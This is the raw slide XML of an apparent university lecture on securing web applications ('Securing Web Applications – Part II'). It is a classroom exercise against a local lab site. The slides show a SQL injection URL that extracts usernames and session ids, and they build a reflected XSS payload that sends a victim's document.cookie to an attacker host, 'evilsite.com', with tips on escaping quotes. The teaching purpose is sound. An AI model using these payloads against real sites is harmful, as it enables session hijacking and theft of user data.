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48" r:id="rId6"/>
    <p:sldId id="367" r:id="rId7"/>
    <p:sldId id="381" r:id="rId8"/>
    <p:sldId id="368" r:id="rId9"/>
    <p:sldId id="369" r:id="rId10"/>
    <p:sldId id="370" r:id="rId11"/>
    <p:sldId id="371" r:id="rId12"/>
    <p:sldId id="372" r:id="rId13"/>
    <p:sldId id="374" r:id="rId14"/>
    <p:sldId id="375" r:id="rId15"/>
    <p:sldId id="395" r:id="rId16"/>
    <p:sldId id="377" r:id="rId17"/>
    <p:sldId id="379" r:id="rId18"/>
    <p:sldId id="380" r:id="rId19"/>
    <p:sldId id="382" r:id="rId20"/>
    <p:sldId id="383" r:id="rId21"/>
    <p:sldId id="384" r:id="rId22"/>
    <p:sldId id="385" r:id="rId23"/>
    <p:sldId id="386" r:id="rId24"/>
    <p:sldId id="387" r:id="rId25"/>
    <p:sldId id="389" r:id="rId26"/>
    <p:sldId id="390" r:id="rId27"/>
    <p:sldId id="391" r:id="rId28"/>
    <p:sldId id="343" r:id="rId29"/>
    <p:sldId id="344" r:id="rId30"/>
    <p:sldId id="396" r:id="rId31"/>
    <p:sldId id="392" r:id="rId32"/>
    <p:sldId id="355" r:id="rId33"/>
    <p:sldId id="356" r:id="rId34"/>
    <p:sldId id="357" r:id="rId35"/>
    <p:sldId id="358" r:id="rId36"/>
    <p:sldId id="290" r:id="rId37"/>
    <p:sldId id="359" r:id="rId38"/>
    <p:sldId id="360" r:id="rId39"/>
    <p:sldId id="361" r:id="rId40"/>
    <p:sldId id="362" r:id="rId41"/>
    <p:sldId id="399" r:id="rId42"/>
    <p:sldId id="364" r:id="rId43"/>
    <p:sldId id="363" r:id="rId44"/>
    <p:sldId id="365" r:id="rId45"/>
    <p:sldId id="366" r:id="rId46"/>
    <p:sldId id="394"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127.0.0.1/xSS%20Example/caribou_computers.php?search=%27)%20UNION%20SELECT%200,username,%20session_id,%200%20from%20session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127.0.0.1/XSS%20Example/caribou_computers.php"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ddons.mozilla.org/en-CA/firefox/addon/cookie-quick-manager/"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127.0.0.1/xss%20Example/caribou_computers.php"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owasp.org/Top10/A05_2021-Security_Misconfiguration/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A04_2021-Insecure_Design/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Component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127.0.0.1/XSS%20Example/caribou_computers.php?referrer=Daves%20Fish%20Market"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127.0.0.1/XSS%20Example/caribou_computers.php?referrer=%3Cb%3EDaves%20Fish%20Market%3C/b%3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65810330-F0B5-43C9-BC34-094FFB5C0529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="82704"/>
            <a:ext cx="12191999" cy="6502399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rectangle 5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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server-Side Web Programming (COMP10260)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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing Web Applications – Part II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58"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578919"/>
            <a:ext cx="5031422"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Ok, now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>that’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a huge problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clearly there’s all sorts of code injection that we can do just by altering the link.  Now we just need to think of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> use for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Like any hacker one of our first goals would be to use this steal credentials.  However, this isn’t very easy. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This bit of JavaScript runs on the browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>after</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the user has authenticated. So that’s not much help.</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77840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578919"/>
            <a:ext cx="5031422"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But recall that web applications don’t just keep re-authenticating people using their passwords.  They keep a session cookie as “evidence” that the person has successfully authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript has all the cookie information in a variable called: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</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We can check this by changing our link to create an alert box with the cookie variable in it, like so: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert(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965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578919"/>
            <a:ext cx="5031422"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However, that only shows the data to the person clicking on the link -- the cookie owner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To use this to get the owner to disclose their cookie to us we’re going to have to get….creative!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35926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689779"/>
            <a:ext cx="5031422"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20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So how did we get our malicious code into their site to begin with?  We used a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" u="sng" dirty="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Couldn’t we use a link to get the data out?  We might have to trick the user to click it, but there are plenty of ways to do that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can we add a link to the caribou computers site through the URL?  Try adding this to the end of your referrer variable:</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='www.apple.com'&gt;Click to logout!&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You should see something like the image on the left!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346247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689779"/>
            <a:ext cx="5031422"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So, we can get malicious code and links INTO this site!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The links can get data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> of this site!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we just need some place to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> this data!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>How about our own website?  Evilsite.com!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349750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Evilsite.com is a website that we created specifically for mounting this kind of attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s a simple home page that has some sponsorship links and a guestbook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The guestbook works by having an HTML form on the page that submits to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The comment is passed on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>URL line as a GET request!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389157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Right now, the referrer link simply takes us to Caribou's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>We can change it to include a link back to our site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>While we’re at it we can add a parameter to the URL so that when it returns to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> it posts a comment like so…</a:t>
            </a:r>
          </a:p>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=test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297753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There are a million ways to do this but the one we are going to explore is by embedding a set of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tags!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Anything in those tags is executed as code right away! So, if we make a URL that ends with</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?referrer=&lt;script&gt;</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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The user’s cookie will appear right next to the referrer name!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58458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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function that immediately inserts this data into the HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Now we need make it output something that starts with:</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Then includes the contents of the cookie variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Then ends with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> following:</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3836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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>That’s a little more difficult than it seems.  We have to be careful about using quotes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Adding a " would mess up the </a:t>
            </a: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tag we have this data in.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can fix that by using a JavaScript function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String.fromCharCode</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which lets us tell JavaScript to output a character by its ASCII code.  For a quote it’s 34</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Also, we need to tell JavaScript to combine these strings into one.  One way to do that is to use the + operator. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245932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39CC-ADCB-CCFC-6D96-393CEC9C0B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Examples – Part II</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6077BD2-23EB-7711-3CAE-D93B9FFCCA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286029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However, if we do that, our attack won’t work.</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is a special character when it appears in a URL line.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Again, there are a lot of solutions to this but an easy one is to simply make multiple calls to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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The text in each one will appear right after the other!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209688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So, your link needs to start like this:</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referrer=Fish market&lt;script&gt;</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evilsite.php?comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=‘);</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(‘&gt;’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Try to finish it on your own.  When you think you have it. Alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilsite.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and see if it works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>The next slide has the answer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3285608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15222" y="2200799"/>
            <a:ext cx="11022515"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Replace the link in </a:t>
            </a:r>
            <a:r>
